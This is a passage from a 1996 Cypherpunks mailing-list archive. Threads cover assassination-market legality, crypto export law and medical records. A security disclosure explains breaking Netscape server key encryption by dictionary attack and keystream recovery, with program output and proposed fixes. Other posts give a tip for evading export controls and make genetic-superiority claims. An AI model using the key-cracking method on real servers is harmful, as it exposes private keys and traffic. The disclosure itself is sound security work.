> system have that. (The ones who DON'T pick up a gun, knife, bomb, poison,
> etc.) Sure, they are aware that somewhere, sometime, somebody _may_ commit
> a crime in order to collect a lottery, but they don't know who, what, when,
> where, or how this will occur, if at all. (either before or after the fact!)
> In fact, since it is possible for a target to collect the reward himself
> (to be directed toward his designee, obviously) by committing suicide and
> "predicting" it, it isn't certain to the other participants that there has
> even been any sort of crime committed!

Moo moo.*

> Based on the mens rea requirement, I propose that there is plenty of room
> for most of the participants to reasonably claim that they are guilty of no
> crime. They have carefully shielded themselves and others from any guilty
> knowledge, and presumably they are entitled to protect themselves in this
> way. Morally, you could argue that these people are countenancing something
> nasty, in the same sense that somebody could equally well argue that if you
> buy a cheap shirt in Walmart you're partly responsible for sweatshop labor
> in El Salvador. True, I suppose, but moral guilt does not always translate
> into legal guilt.
>

Moo moo.*

>
> > And yes, I've read Jim Bell's manifesto. The fact
> >that no lawyer has dissected it from a legal standpoint has been used by
> >Mr. Bell as support for the proposition that it is legal.
>
> I suggest that there is a greater likelihood that the "powers that be" will
> just abandon all pretense of legality, and attempt to strike at the
> participants if they can find them without benefit of any sort of trial.
> This is a more plausible conclusion, because it cuts through all of the
> legal difficulties which would hinder prosecution. In effect, a low-level
> undeclared war.

I disagree that that will be the response, but you should be willing to allow one group of people to fight fire with fire.

EBD

>
> Jim Bell
> jimbell at pacifier.com
>

* Calling a cow a duck doesn't make it one.
From cmefford at avwashington.com Wed Sep 25 11:14:49 1996
From: cmefford at avwashington.com (Chip Mefford)
Date: Thu, 26 Sep 1996 02:14:49 +0800
Subject: unsubscibe
Message-ID:

unsubscibe

From s1113645 at tesla.cc.uottawa.ca Wed Sep 25 11:22:45 1996
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 26 Sep 1996 02:22:45 +0800
Subject: Where to write crypto?
In-Reply-To:
Message-ID:

On Tue, 24 Sep 1996, Steve Schear wrote:

> I believe Taiwan might be an excellent location to have 'clear room' crypto
> work done. Taiwan has a very large skilled software labor pool and isn't a
> member of COCOM.

Why go so far, when you can export crypto from Anguilla or Canada. The first is right next to Florida and is a tax haven, the second has a large talent pool and the same quality telecom as the States. The main problem is concealing the fact that there may be any Americans involved.

Both save you the trouble of learning Chinese.

From mwohler at ix.netcom.com Wed Sep 25 11:33:49 1996
From: mwohler at ix.netcom.com (Marc J. Wohler)
Date: Thu, 26 Sep 1996 02:33:49 +0800
Subject: WHO IS MAKING A MOCKERY OF WHOM?
Message-ID: <199609251426.HAA02190@dfw-ix1.ix.netcom.com>

At 05:55 PM 9/24/96 -0400, you wrote:
>At 06:15 AM 9/24/96 -0700, Sandy Sandfort wrote:
>
>>C'punks,
>>Time for another informal poll.
>>
>>On Mon, 23 Sep 1996, John Anonymous MacDonald wrote:
>>> What a joy to make a public mockery of Tim Mayo!
>>
>>Do list members think Anonymous' posts make a public mockery of
>>Tim May or Anonymous? Let me know whose reputation you think
>>is enhanced or tarnished by these posts. I'll post a summary to
>>the list in a week or two.
>

I vote for Anonymous.

Also, it seems evident that some non-anonymous posters aka KTOM seem to understand how to *abuse* our American freedoms but don't understand about *responsible* use.

Is this a deliberate attempt to damage this list or is it that some folk just can't handle freedom?

M. J.
Wohler

From jya at pipeline.com Wed Sep 25 11:37:08 1996
From: jya at pipeline.com (John Young)
Date: Thu, 26 Sep 1996 02:37:08 +0800
Subject: PEA_nut
Message-ID: <199609251417.OAA27148@pipe3.ny2.usa.pipeline.com>

9-25-96. WaJo reports on yesterday's suit challenging Georgia's crackerdown on the Internet, including its prohibition of anonymity. Ms. Dyson avidly supports anon, it lies.

---------

http://jya.com/peanut.txt

PEA_nut

From jf_avon at citenet.net Wed Sep 25 12:36:04 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Thu, 26 Sep 1996 03:36:04 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
Message-ID: <9609251433.AB02026@cti02.citenet.net>

On 25 Sep 96 at 5:59, Brian Davis wrote:

> I disagree that that will be the response, but you should be willing
> to allow one group of people to fight fire with fire.

But generally, it has been found a much better solution to fight fire with water, and this is why I am not convinced of the ideological effectiveness of AP, although I don't doubt its operational effectiveness at all.

I will take that sentence only slightly out-of-(specific)-context and make a still pertinent remark about it: This is *exactly* what Jim Bell, because of his opinions, envision to do with the AP system.

I find that absolutely hilarious!

jfa

Please reply by e-mail since I am not on Cypherpunks anymore.

From pgf at acadian.net Wed Sep 25 12:44:32 1996
From: pgf at acadian.net (Phil Fraering)
Date: Thu, 26 Sep 1996 03:44:32 +0800
Subject: ISPs' information on users
In-Reply-To:
Message-ID:

On Tue, 24 Sep 1996, Timothy C. May wrote:

> (There's a certain new ISP with tight links to a quasi-religious group much
> in the news lately, and some have speculated that this ISP may be
> monitoring certain users....)
>
> --Tim May

Which ISP and religious group is this?

Phil Fraering        The above is the opinion of neither my internet
pgf at acadian.net   service provider nor my employer.
318/261-9649

From sandfort at crl.com Wed Sep 25 12:46:06 1996
From: sandfort at crl.com (Sandy Sandfort)
Date: Thu, 26 Sep 1996 03:46:06 +0800
Subject: AP [was: Re: Kiddie porn on the Internet] [NOISE]
In-Reply-To: <32488A8F.6FF2@gte.net>
Message-ID:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SANDY SANDFORT
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Tue, 24 Sep 1996, Dale Thorn wrote:

> You are committing a logical fallacy with the above. You're saying that
> the mugger who commits the crime with a stolen gun is equivalent to my
> own hired hitmen (the local and federal police I pay so dearly for).

Incorrect. Dale is assuming facts not in evidence. See below.

> This is obviously not the case. I didn't hire the mugger, nor did I
> encourage the thief in an overt way. But I did consciously select and
> pay for the police and govt. assassins.

Then perhaps attacks against Dale are appropriate since he takes credit for supporting these people.

> And so did you. Unless you're saying that the govt. forcibly
> takes you down to the voting booth, etc.

Well, I don't know what "etc." is supposed to include, but I don't vote. But even assuming, arguendo, that I did, (a) I see no support if I were to vote AGAINST government assassins who are none the less elected, and (b) even a self-defense vote for the lesser of two evils is an awfully thin thread on which to hang a death sentence. Should Sofie, in the movie, "Sofie's Choice" have been put to death because she exercised the "choice" given to her of choosing which of her children was to live? I don't think so.
S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From pgf at acadian.net Wed Sep 25 12:46:20 1996
From: pgf at acadian.net (Phil Fraering)
Date: Thu, 26 Sep 1996 03:46:20 +0800
Subject: Medical Data
In-Reply-To:
Message-ID:

Of course, one area where the doctor will continue to hold a patient's records, instead of the patient, due to the nature of the current system: Prescription medication.

Of course, with the really big problems with this stuff, drug interactions, there's still no system for a doctor to find out what you're on thanks to another doctor. Which is why it's very important to always use the same pharmacist.

Phil Fraering        The above is the opinion of neither my internet
pgf at acadian.net   service provider nor my employer.
318/261-9649

From pgf at acadian.net Wed Sep 25 12:49:28 1996
From: pgf at acadian.net (Phil Fraering)
Date: Thu, 26 Sep 1996 03:49:28 +0800
Subject: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To:
Message-ID:

I guess the final word on assassination politics would be obvious:

It's widely believed that the New Orleans Mafia (the source of my recent statement about body decomposition in Louisiana swamps) was a prime driver in the assassination of the late President John F. Kennedy.

I think it's fairly safe to say that having done this didn't do them a damn bit of good. It didn't do anyone else a damn bit of good. The world remained just as corrupt as it always was.

Phil Fraering        The above is the opinion of neither my internet
pgf at acadian.net   service provider nor my employer.
318/261-9649

From asgaard at Cor.sos.sll.se Wed Sep 25 12:50:21 1996
From: asgaard at Cor.sos.sll.se (Asgaard)
Date: Thu, 26 Sep 1996 03:50:21 +0800
Subject: Medical Data
In-Reply-To:
Message-ID:

On Tue, 24 Sep 1996, Timothy C. May wrote:

> Why can't patients carry their _own_ medical records, and disclose what
> they wish to disclose to doctors and hospitals, as they see fit?
> Whether implemented in a high-tech version, as a "smart card," or a low-tech
> version, as a "dossier" (a file folder), the principle's the same.

One problem is when a patient is suing his doctor, but claiming that his 'dossier' was lost in a fire. The doctor then has to defend himself with only 'your word against mine' instead of having his own account of what was happening on file, including test results etc that could be very interesting for the defence.

Asgaard

From pgf at acadian.net Wed Sep 25 13:00:16 1996
From: pgf at acadian.net (Phil Fraering)
Date: Thu, 26 Sep 1996 04:00:16 +0800
Subject: Public Schools
In-Reply-To: <20uRuD1w165w@bwalk.dm.com>
Message-ID:

On Tue, 24 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> You must have attended a public school if you don't understand that genetic
> superiority leads to economic success. My older kid goes to a private school.
> The parents are obviously genetically superior to public school parents.

Stop wallowing around in determinism if you expect to get anywhere.

> > And the reason it costs so much to send a kid to private school is that
> > everyone's already paying for a more expensive public school thanks to all
> > the taxes.
>
> Push vouchers. What's the cryptorelevance of your comments, anyway?

Without vouchers, you don't say anything about the intelligence of your test subjects; to a _very_ large degree, intelligence isn't genetic. Or it helps for the first five minutes, but after that you're on your own. "The world is full of unrewarded genius..."

> > So if I'm economically successful it'll change my genes?
> >
> > I guess this is the famous Russian belief in Lamarckianism in action.
> No, on the contrary, sending poor kids to good schools on scholarships
> does not improve their genes. They tend to become drug dealers.

At the private school I went to this was not the case. Only the spoiled rich kids were that stupid, although by your definitions, they should have been smarter than that.
> Dr.Dimitri Vulis KOTM
> Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>

Phil Fraering        The above is the opinion of neither my internet
pgf at acadian.net   service provider nor my employer.
318/261-9649

From asgaard at Cor.sos.sll.se Wed Sep 25 13:02:16 1996
From: asgaard at Cor.sos.sll.se (Asgaard)
Date: Thu, 26 Sep 1996 04:02:16 +0800
Subject: We removed radikal 154 from xs4all :(
In-Reply-To: <199609242023.NAA10037@dns1.noc.best.net>
Message-ID:

On Tue, 24 Sep 1996, James A. Donald wrote:

> Let us just run through the sequence of events.
>
> A bunch of leftover commies publish some boring commie crap in Germany,
> which probably most people would have ignored.

But are these people really 'leftover commies'? Trying to read #154 is rather confusing (but my German is not that great, which could explain this). The 'Autonomen' don't seem to be 'leftover' in the real sense, you get the impression they are young people. Obviously they are opposed to the 'Punks' whatever that means. I wish someone from Germany could deliver a short resume of their political views - the interesting question being why the German authorities obviously fear them. (One German on the list has opined that they are 'childish' but that doesn't say much.)

Asgaard

From tcmay at got.net Wed Sep 25 13:05:36 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 04:05:36 +0800
Subject: reputation, e.g. www.ffly.com (was: Not reputation again! (Was: The Nature ofthe Cypherpunks List) )
Message-ID:

As Bryce addressed this to me as the primary recipient, I have to assume he's ascribing these ideas to me.

At 12:19 PM 9/25/96, bryce at digicash.com wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>It's silly to conflate ratings of people with ratings of
>people's opinions with ratings of people's ratings of etc.
>
>
>Some of the people I work with have awful opinions on politics,
>other people, music, movies, books, and food, but great opinions
>on computer hardware, algorithms and programming languages.
...

I never said there is going to be a simple scalar rating. In my last major post on this, several weeks ago, I even elaborated, saying that even Alice's rating of Bob, for example, would have multiple components, such as her rating of his taste in movies, his taste in restaurants, his political beliefs, his technical expertise, etc.

This area is complicated enough to talk about with oversimplifying-and-then-critiquing. These are usually called "straw man" arguments.

--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From jya at pipeline.com Wed Sep 25 13:13:18 1996
From: jya at pipeline.com (John Young)
Date: Thu, 26 Sep 1996 04:13:18 +0800
Subject: Esther Dyson and anonymity
Message-ID: <199609251656.QAA03196@pipe3.ny2.usa.pipeline.com>

You're right, I was too mindlessly rantish about Esther Dyson's WSJ comments.

However, I bought Esther a bottle of champagne in NYC a few days ago, sent it to her table signed "An Admiring Cypherpunk."

She came over to say hello, and we chatted a bit about her recent messages on Cypherpunks, which I complimented her for posting.

She still doesn't know my name, I said I was "Anonymous." She grinned and staggered away.

The champagne brought her over to the side of Anonymous, that's it.
AYA

From loki at infonex.com Wed Sep 25 13:17:42 1996
From: loki at infonex.com (Lance Cottrell)
Date: Thu, 26 Sep 1996 04:17:42 +0800
Subject: We removed radikal 154 from xs4all :(
In-Reply-To: <199609242023.NAA10030@dns1.noc.best.net>
Message-ID:

At 12:45 AM -0700 9/24/96, James A. Donald wrote:
>Every time one site capitulates, it will inspire two dozen others to
>join the fray. I joined the fight *because* xs4all had to capitulate.
>

Speaking of which, is there a list of mirror sites?

Just for the record: http://www.cyberpass.net/radikal

-Lance

----------------------------------------------------------
Lance Cottrell loki at obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra. Suddenly
it flips over, pinning you underneath. At night the ice
weasels come." --Nietzsche
----------------------------------------------------------

From tcmay at got.net Wed Sep 25 13:22:50 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 04:22:50 +0800
Subject: unsubscibe
Message-ID:

At 2:00 PM 9/25/96, Chip Mefford wrote:
>unsubscibe

"unsubscibe" is not a word. Nor is "unsuscrive," or "unscrive."

Send the correct word to the correct address, stated often here, and you will be unsubscribed.

--Tim May

(Hint: majordomo at toad.com, with message body of "unsubscribe cypherpunks" (no quotes))

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."
From gnu at toad.com Wed Sep 25 13:28:20 1996
From: gnu at toad.com (John Gilmore)
Date: Thu, 26 Sep 1996 04:28:20 +0800
Subject: Feds trying to stop judicial review of Commerce Dept export controls
Message-ID: <199609251631.JAA18345@toad.com>

[They appear to be trying to transfer all the export controls from the State Dept to the Commerce Dept -- including all the unconstitutional and heavy-handed parts. -- John]

Date: Wed, 25 Sep 1996 11:34:23 -0400
From: (Daniel J. Weitzner)

Memorandum

To: Interested Parties
Re: Proposed Amendments to Preclude Judicial Review in the Export Administration Act of 1996 (H.R. 361)
Date: September 25, 1996

Failed U.S. encryption export controls continue to threaten Internet security, individual privacy, and the competitiveness of U.S. industry. Proposed amendments to H.R. 361, The Omnibus Export Administration Act of 1996 (see attached), would make this problem worse by preventing judicial review of Commerce Department export control decisions, and should be defeated. These Amendments:

* Would further entrench a failed U.S. encryption policy
* Would provide extraordinary relief that is unjustified, and would shift the balance of power in the ongoing public debate over Internet security.
* Will prevent judicial review of a broad area of public policy affecting the First and Fourth Amendment rights of Americans.
* Are inappropriate legislative meddling in ongoing controversies
* Are unnecessary as the EAA already contains strict judicial review provisions.

On balance, the Amendments would shelter the highly sensitive area of Internet security from much-needed judicial scrutiny. The Amendments are inappropriate, unjustified, and should not be approved.

The Amendments entrench a failed U.S. encryption policy -- Administration export regulation of encryption keep U.S. computer users from protecting their privacy online and damage the competitiveness of U.S. industry.
Three active cases in Federal Court are challenging these export controls. Three bills have been proposed in this session of Congress with bipartisan support to address what many believe to be the inappropriate application of export controls to encryption exports. The Amendments would further entrench these controversial regulations by sheltering them from much-needed judicial scrutiny.

The Amendments provide extraordinary, unjustified relief -- The Amendments would preclude all judicial review under the Administrative Procedure Act, including challenges to arbitrary and capricious rule-making or improper statutory interpretation. They would extend the already limited judicial review provisions in the original EAA and H.R.361 to preclude nearly all substantive review. Congress has made no findings that would suggest that such unusual relief is warranted. Typically, relief from judicial review might be granted in areas where excessive or inappropriate litigation is feared in areas that Congress feels are well-settled. Such is not the case here. The problem with encryption export controls has not been too much litigation.

The Amendments prevent judicial review of decisions that implicate First, Fourth, and Fifth Amendment rights -- Export controls have been the Administration's exclusive vehicle for its key escrow encryption proposals -- which have a grave impact on Americans' First, Fourth, and Fifth Amendment rights. The Amendments would thus preclude judicial review in an area broadly affecting the rights of individuals and the growth of a new medium.

The Amendments will likely interfere with important cases and controversies -- These Amendments would raise a serious impediment to those seeking judicial relief from what many believe to be unfair encryption export control policies. Judicial review provisions in the EAA and the Arms Export Control Act (AECA) were the basis for a federal judge's recent dismissal of a challenge to the encryption export controls.
The EAA provisions will soon take on added significance as it is widely believed that the Administration will shift jurisdiction over encryption export controls from the State Department to the Commerce Department in the near future.

The Amendments are unnecessary -- H.R. 361 as passed by the House already contains significant judicial review limitations. The bill already provides unusual constraints -- on both subject matter and venue -- for challenges to Commerce decision-making under the Act. There is little to indicate that the further extraordinary relief of these Amendments is required.

* * * * *

Encryption export controls represent an area where it is widely believed that the Administration is abusing its discretion in order to use powerful export regulations to influence the domestic market for and use of important technologies. Without recourse in the Executive Branch -- or in Congress this session -- concerned parties have been forced to turn to the courts. It is in just such a critical area where parties are most in need of judicial review. The Amendments suggested would serve to deny individuals and companies their much-needed day in court, have not been justified, and should not be approved.

For more information, please contact:

Daniel Weitzner, Deputy Director
Alan Davidson, Staff Counsel
Center for Democracy and Technology
(202) 637-9800

Amendments to The Omnibus Export Administration Act of 1996 (H.R. 361)

1. Amendment to Section 112 (Administrative and Judicial Review)

Text:

On page 125, at line 17 in Section 112, insert: "The provisions of this section shall constitute the exclusive basis for judicial review of any agency action taken pursuant to this title and the regulations promulgated thereunder."

On page 126, at line 1 in Section 112(a)(2), insert "only" between "reviewed" and "by appeal".

On page 126, at line 3 in Section 112(a)(2), insert "and only" between "Circuit," and "to the extent".
On page 126, at line 6 in Section 112(a)(2)(A), strike (A) and replace as follows: "(A) regulations fail to provide for procedures required by this title;".

On page 126, at line 12 in Section 112(a)(2)(B), insert "procedural requirements of" between "violates" and "this title;".

On page 127, at line 5 in Section 112(a)(2)(H), insert "procedural" between "with the" and "requirements".

On page 127, at line 7, add a new paragraph (3) to Section 112(a) as follows: "Preclusion of Review. -- Substantive decisions of the Secretary and other officials on (i) whether to impose, expand, or extend export controls on any commodity or technology, (ii) whether and how to revise the Commodity Control Index, (iii) whether and under what conditions to grant, deny, or modify any export license, and (iv) any other questions of law or fact under this title (except as otherwise provided in subsections (b)-(d) of this section), shall be final and conclusive and no court shall have power or jurisdiction to review any such decision by an action in the nature of mandamus or otherwise."

============================================================================
Daniel J. Weitzner, Deputy Director
Center for Democracy and Technology    202.637.9800 (v)
1634 Eye St., NW Suite 1100            202-637.0968 (f)
Washington, DC 20006                   http://www.cdt.org/

* PROTECT THE INTERNET AND THE FUTURE OF FREE SPEECH IN THE INFORMATION AGE *

Join the legal challenge against the Communications Decency Act!
For More Information, Visit the CIEC Web Page http://www.cdt.org/ciec/ or email

From ceo at oss.net Wed Sep 25 13:43:24 1996
From: ceo at oss.net (Robert Steele)
Date: Thu, 26 Sep 1996 04:43:24 +0800
Subject: your mail
In-Reply-To: <10093730201704@infowar.com>
Message-ID:

Requiring people to call Betty to tell her they sent email is very low rent and will discredit the site. Recommend you delete that element. Like putting roller skates on a horse!
From dlv at bwalk.dm.com Wed Sep 25 13:51:46 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 26 Sep 1996 04:51:46 +0800
Subject: Public Schools
In-Reply-To:
Message-ID:

Phil Fraering writes:
> Without vouchers, you don't say anything about the intelligence of your
> test subjects; to a _very_ large degree, intelligence isn't genetic. Or

That's the politically correct thing to say, but do you have any scientific evidence to support this claim?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From webwarrior at infowar.com Wed Sep 25 13:52:20 1996
From: webwarrior at infowar.com (Craig)
Date: Thu, 26 Sep 1996 04:52:20 +0800
Subject: No Subject
Message-ID: <10093730201704@infowar.com>

Subject Line: Infowar.Com

> ---- D I S T R I B U T E W I D E L Y ----
>
>WWW.InfoWar.Com is now open.
>
>The Definitive WWW site for Information Warfare & Information Security.

Created and managed by Winn Schwartau, Infowar.Com is designed to be "The" place to be seen and be heard. Be seen. Be linked. Our goal: To be a clearinghouse for all IW and InfoSec.

>
>News. Infowar. Articles. Discussions. The Latest. Experts. Reviews. Opinion.
>Civil Defense. Info-Security. Controversy. Privacy. Crypto. Chats. List-servers.
>Espionage. Military. C4I. Civil Defense. Global.
>
>Be seen. Be heard. Globally. Dynamic. New. Interactive.
>
>Yes, we're starting off small - manageable, but within a few short months look
>at what we will have - on-line, bringing in tens of thousands of infosecurity
>and information professionals. With your help, we'll be everything you want us
>to be.
>
>* Timely Articles and Commentaries
>* Military/Government infowar treatises hot off the press
>* News that concerns you - As it Happens!
>* Infowar.Com List Server and Private Discussion Groups (to begin with)
>    Infowar
>    Civil Defense
>    Terrorism
>    OSCINT
>    Hacking
>* Over 600MB of on-line utilities for the Net
>* On-Line Searches for Infowar and Infosec
>* The Infowar and Infosec Papers That Set Standards
>* Press Releases
>* What's New!?!
>* Audio Conferences
>* Video Conference
>* Specifications and Standards
>* Product and Company Listings - Worldwide
>* Contracts and Bids
>* Specifications
>* New papers and reports in all areas of Infowar
>* Extensive International participation
>* Compilations of the Best of Infowar and Infosec
>* Hundreds of Security Utilities
>* Over 50 different encryption tools
>* User customized search engines for the entire site
>* Interactive Infowar-Chat lines
>* Who's Who of Infowar and Info-Sec
>* Gigs and gigs . . . .
>* And more . . . stuff we won't even tell our mothers about . . . yet . .
>
>We've always been interactive minded and we will count upon our users and
>sponsors to guide us to provide better and better service. But, we will not
>react to editorial extortion, either. We have made our reputation on
>brutal honesty and opinion and we will keep it. Might lose an advertiser from
>time to time, but those is the breaks.
>
>We hope to see you there, contributing, interacting, discussing, commenting,
>posting and contributing.

Contributions: betty at infowar.com or webwarrior at infowar.com

All submissions are gratefully accepted however, will be reviewed for relevance and content prior to being published.

IF - you hear something hot...see something hot..... be a good Warrior and call Betty at 813-367-7277 and leave a message that you have e-mailed the info. That way we can be sure to look for it and get it out on distribution.

You want to add some Warriors to our ListServ: betty at infowar.com or webwarrior at infowar.com

>
>If you happen to be interested in Infowar.Com Sponsorship opportunities,

please give us a ring: Our rates are very competitive....
and get on the bandwagon so we can *lock-in the rate.
>
>Betty at Infowar.com
>or call
>813.367.7277
>
>Thank You
>
>Winn Schwartau
>and the terrific folks at
>Infowar.Com
> Winn Schwartau - Interpact, Inc.
> Information Warfare and InfoSec
> V: 813.393.6600 / F: 813.393.6361
> Http://www.infowar.com
> Winn at infowar.com
>

From tcmay at got.net Wed Sep 25 14:03:49 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 26 Sep 1996 05:03:49 +0800
Subject: Anonymous Mail at US Post
Message-ID:

At 12:45 AM 9/25/96, Greg Kucharo wrote:
>I don't know if anyone else has seen this, but I was mailing letters
>in the "out front" boxes the other day when I noticed a sign. The sign
>said that all packages 16 ounces or over had to be taken inside for
>disposal into the mail slot. The obvious explanation being that even
>though you can abstain from marking a return address, the postal
>inspectors would like a nice photo of you with your mail.

Yes, this was the chief topic of discussion here a few weeks ago. :-}

One of the serious downsides of someone filtering out messages is that all
1400 of us then see the same topics presented again. (This is more serious
when people are forwarding long articles or press releases, with sometimes
half a dozen copies being received on the list.)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From m5 at tivoli.com Wed Sep 25 14:12:09 1996
From: m5 at tivoli.com (Mike McNally)
Date: Thu, 26 Sep 1996 05:12:09 +0800
Subject: Rutgers DIMACS Dist. Trust Workshop
Message-ID: <32496D93.7885@tivoli.com>

Has anyone who's registered for next week's conference at Rutgers
gotten any sort of confirmation? I've been trying for days to do
so, and though I've sent mail and called I haven't managed to get
hold of anyone who can tell me anything. (And now they seem to not
answer the phone at all; I think they got a bigger response than
they expected.)

--
______c_________________________________________________________________
Mike M Nally * IBM % Tivoli * Austin TX * How quickly we forget that
mailto:m5 at tivoli.com mailto:m101 at io.com * "deer processing" and "data
http://www.io.com/~m101/ * processing" are different!

From vipul at pobox.com Wed Sep 25 14:38:40 1996
From: vipul at pobox.com (Vipul Ved Prakash)
Date: Thu, 26 Sep 1996 05:38:40 +0800
Subject: Euro-Commission to tackle porn on Internet
Message-ID: <199609260004.AAA00668@fountainhead.net>

*** Euro-Commission to tackle porn on Internet

The European Commission, faced with calls to clamp down on Internet
pornography following a Belgian pedophilia scandal, will take a first
step in October toward seeing how it can be done. On Oct. 9, Culture
Commissioner Marcelino Oreja plans to unveil a paper outlining how to
identify authors of Internet pornography and how to interrupt that
pornography. Oreja said options raised in the paper include
encrypting access so that only those who pay could see the material
or including a V-chip to screen against pornographic content.
For the full text story, see
http://www.merc.com/stories/cgi/story.cgi?id=178562-80c

- Vipul

--
Vipul Ved Prakash | - Electronic Security & Crypto
vipul at pobox.com | - Internet & Intranets
91 11 2247802 | - Web Development & PERL
198 Madhuban IP Extension | - Linux & Open Systems
Delhi, INDIA 110 092 | - (Networked) Multimedia

From pgut001 at cs.auckland.ac.nz Wed Sep 25 14:42:23 1996
From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz)
Date: Thu, 26 Sep 1996 05:42:23 +0800
Subject: [Long] How to break Netscape's server key encryption
Message-ID: <84366802803808@cs26.cs.auckland.ac.nz>

The Netscape server key format is very susceptible to both a dictionary attack
and to keystream recovery. It uses the PKCS #8 format for private keys, which
provides a large amount of known plaintext at the start of the data, in
combination with RC4 without any form of IV or other preprocessing (even though
PKCS #8 recommends that PKCS #5 password-based encryption be used), which means
you can recover the first 100-odd bytes of key stream with a simple XOR (the
same stupid mistake Microsoft made with their .PWL files). This means two
things:

1. It's very simple to write a program to perform a dictionary attack on the
   server key (it took me about half an hour using cryptlib, and another half
   hour to rip the appropriate code out of cryptlib to create a standalone
   program).

2. The recovered key stream from the encrypted server key can be used to
   decrypt any other resource encrypted with the server password, *without
   knowing the password*. This is because there's enough known plaintext
   (ASN.1 objects, object identifiers, and public key components) at the start
   of the encrypted data to recover large quantities of key stream.

To demonstrate the problem, I have written a program which performs a
dictionary attack on the server key, and if successful prints the password used
to encrypt it and the server's RSA private key.
Originally I used my encryption library
(http://www.cs.auckland.ac.nz/~pgut001/cryptlib.html) to do the encryption, to
turn it into a standalone program I ripped the necessary parts out of the
library, which means it's a bit messy and not as portable as the original was.
The code could probably be made to run about twice as fast if it's properly
optimised, but I don't know if it's worth the bother and besides, it's just
gone 4am I could use some sleep.

To run it, use:

breaksk

Here's the output from a server key someone sent me, tested against my 100MB+
word list collection (some people collect stamps, I collect word lists :-):

The password used to encrypt this Netscape server key is 'unguessable'.

Modulus = 00D50626580C2543378FD249994A543FBF5FF1333E70684E942EC7034E5FA [...]
Public exponent = 03
Private exponent = 008E0419900818D77A5FE18666318D7FD4EAA0CCD44AF03462C9 [...]
Prime 1 = 00FBD3FC2CE1F50B31323F2D3FA27F6708D4373CC0487DB7199A712124380 [...]
Prime 2 = 00D88D984BA6A7CD07F6608D95D3AC2682769DA904D061E593CF86A21B4A9 [...]
Exponent 1 = 00A7E2A81DEBF8B220CC2A1E2A6C54EF5B3824D32ADAFE7A1111A0C0C2 [...]
Exponent 2 = 00905E6587C46FDE054EEB090E8D1D6F01A4691B588AEBEE628A59C167 [...]
Coefficient = 2DEBC012356B96D2206346141371D999288F55DD07AEF6D1972383E97 [...]

(I've trimmed some of the lines a bit).

The problem here is caused by a combination of the PKCS #8 format (which is
rather nonoptimal for protecting private keys) and the use of RC4 to encrypt
fixed, known plaintext. Since everything is constant, you don't even need to
run the password-transformation process more than once - just store a
dictionary of the resulting key stream for each password in a database, and you
can break the encryption with a single lookup (this would be avoided by the use
of PKCS #5 password-based encryption, which iterates the key setup and uses a
salt to make a precomputed dictionary attack impossible.
PKCS #5 states that its primary intended application is for protecting private
keys, but Netscape chose not to use this and went with straight RC4 instead).

A quick (but not necessarily optimal) solution to the problem involves two
changes:

1. Only encrypt the unknown, private fields in the key (which is what PGP
   does). Instead of wrapping everything up in several layers of
   encapsulation with object identifiers and public-key components, change the
   portion which is encrypted to:

   EncryptedRSAPrivateKey ::= SEQUENCE {
       privateExponent INTEGER,
       prime1 INTEGER,
       prime2 INTEGER,
       exponent1 INTEGER,
       exponent2 INTEGER,
       coefficient INTEGER
       }

   with everything else outside this object.

2. Don't use a simple stream cipher to encrypt fixed data like this. Use an
   IV on the encrypted data. Iterate the password setup to slow down a
   dictionary attack (I posted a scheme for transforming variable to
   fixed-length keys to the cypherpunks list a few days ago which provides the
   necessary functionality).

The consequences of this attack are pretty scary. It involves vastly less
effort than breaking a 40-bit session key or factoring a 512-bit public key,
yet once you've recovered the private key you can also recover every session
key it's ever protected in the past and will ever protect in the future (which
is why I'm a fan of signed DH for session key exchange). The ease with which a
dictionary attack can be carried out represents a critical weakness which
compromises all other encryption components on the server - spending a few days
with a Markov-model based phrase generator on a PC is still a lot easier than
spending a few months with GNFS and a workstation farm.

It seems strange that there are no real standards defined for secure storage of
such a critical component as a private key.
Although a lot of work has gone into X.509 and the multitude of related
public-key certificate standards, the only generally-used private-key formats
